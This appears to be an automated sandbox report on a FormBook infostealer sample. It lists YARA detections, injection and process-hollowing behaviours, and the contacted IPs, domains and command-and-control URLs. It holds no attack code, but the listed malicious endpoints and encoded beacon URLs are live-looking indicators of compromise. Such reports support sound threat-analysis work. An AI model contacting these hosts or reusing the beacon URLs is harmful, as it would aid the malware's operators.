Source: C:\Users\user\Desktop\fooYgfbxno.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected FormBook
Source: Yara match File source: 2.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.aspnet_compiler.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.aspnet_compiler.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.aspnet_compiler.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.aspnet_compiler.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.359226665.0000000001440000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.359013651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.529429210.00000000034D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.311031707.0000000007126000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.295364991.0000000007126000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.359257959.0000000001470000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000000.267043761.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.528926429.0000000000C60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.529505063.0000000003500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000000.267329216.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.273482433.00000000041A7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality
barindex
Yara detected FormBook
Source: Yara match File source: 2.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.aspnet_compiler.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.aspnet_compiler.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.aspnet_compiler.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.aspnet_compiler.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.359226665.0000000001440000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.359013651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.529429210.00000000034D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.311031707.0000000007126000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.295364991.0000000007126000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.359257959.0000000001470000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000000.267043761.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.528926429.0000000000C60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.529505063.0000000003500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000000.267329216.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.273482433.00000000041A7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 626604 Sample: fooYgfbxno Startdate: 14/05/2022 Architecture: WINDOWS Score: 100 29 www.xn--ekrt15fxyb2t2c.xn--czru2d 2->29 45 Snort IDS alert for network traffic 2->45 47 Multi AV Scanner detection for domain / URL 2->47 49 Found malware configuration 2->49 51 6 other signatures 2->51 10 fooYgfbxno.exe 1 2->10         started        signatures3 process4 file5 27 C:\Users\user\AppData\...\fooYgfbxno.exe.log, ASCII 10->27 dropped 53 Writes to foreign memory regions 10->53 55 Allocates memory in foreign processes 10->55 57 Injects a PE file into a foreign processes 10->57 14 aspnet_compiler.exe 10->14         started        signatures6 process7 signatures8 59 Modifies the context of a thread in another process (thread injection) 14->59 61 Maps a DLL or memory area into another process 14->61 63 Sample uses process hollowing technique 14->63 65 2 other signatures 14->65 17 svchost.exe 14->17         started        20 explorer.exe 14->20 injected process9 dnsIp10 37 Modifies the context of a thread in another process (thread injection) 17->37 39 Maps a DLL or memory area into another process 17->39 41 Tries to detect virtualization through RDTSC time measurements 17->41 23 cmd.exe 1 17->23         started        31 www.hofwimmer.com 20->31 33 www.mentalnayaarifmetika.online 185.68.16.179, 49763, 80 UKRAINE-ASUA Ukraine 20->33 35 9 other IPs or domains 20->35 43 System process connects to network (likely due to code injection or exploit) 20->43 signatures11 process12 process13 25 conhost.exe 23->25         started       
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
104.21.89.61
 www.huvao.com United States
13335 CLOUDFLARENETUS true
185.68.16.179
 www.mentalnayaarifmetika.online Ukraine
200000 UKRAINE-ASUA true
213.186.33.5
 www.chambaultfleurs.com France
16276 OVHFR true
209.15.40.102
 lotsimprovements.com Canada
13768 COGECO-PEER1CA true
61.14.208.3
 www.xn--hj2bz6fwvan2be1g5tb.com Korea Republic of
45382 EHOSTIDC-AS-KREHOSTICTKR true
206.189.50.60
 www.hofwimmer.com United States
14061 DIGITALOCEAN-ASNUS true

Contacted Domains

Name IP Active
lotsimprovements.com 209.15.40.102 true
www.huvao.com 104.21.89.61 true
www.chambaultfleurs.com 213.186.33.5 true
www.xn--hj2bz6fwvan2be1g5tb.com 61.14.208.3 true
www.hofwimmer.com 206.189.50.60 true
www.mentalnayaarifmetika.online 185.68.16.179 true
www.myamazonloan.net unknown unknown
www.lotsimprovements.com unknown unknown
www.zyaxious.website unknown unknown
www.doxofcolor.com unknown unknown
www.xn--ekrt15fxyb2t2c.xn--czru2d unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://www.chambaultfleurs.com/ocgr/?lfvx9=JFNTlvkP_&P2Jl4=TZNys7210trfg8O8WBMuzy6C02I8maceBl4kNVlEZuNH+N4fd/TFP34Py3WDgrqbJJxT true
  • Avira URL Cloud: malware
 unknown
http://www.lotsimprovements.com/ocgr/?P2Jl4=o9xz2vqcTVXu/W078IUcrzT+VrP3S9wZB9suAAi9fTl7LQCsWydvJWt3Uuk2q/fLQQGI&lfvx9=JFNTlvkP_ true
  • Avira URL Cloud: malware
 unknown
http://www.xn--hj2bz6fwvan2be1g5tb.com/ocgr/?lfvx9=JFNTlvkP_&P2Jl4=zPygAtD4LGfbsOxaPXlKDZlA/HZsirEX7sJv7vNHedMyDqAMsgZk6w8aA/BuIJhq09F8 true
  • Avira URL Cloud: malware
 unknown
http://www.huvao.com/ocgr/?P2Jl4=1BqqsZcQDAJnvcG+ktWW1SuLtWUnTVqW01xF9ocnHpFG4dYykDk5mjpX7chd6+Nfhcmp&lfvx9=JFNTlvkP_ true
  • Avira URL Cloud: malware
 unknown
www.mentalnayaarifmetika.online/ocgr/ true
  • Avira URL Cloud: malware
 low
http://www.mentalnayaarifmetika.online/ocgr/?P2Jl4=WCPK4waC2+ZoHrOc/rbcYrxYoSsYkto1AfFtfo68nJJBD8+b6aAxZ/giJh8W0WW05dhF&lfvx9=JFNTlvkP_ true
  • Avira URL Cloud: malware
 unknown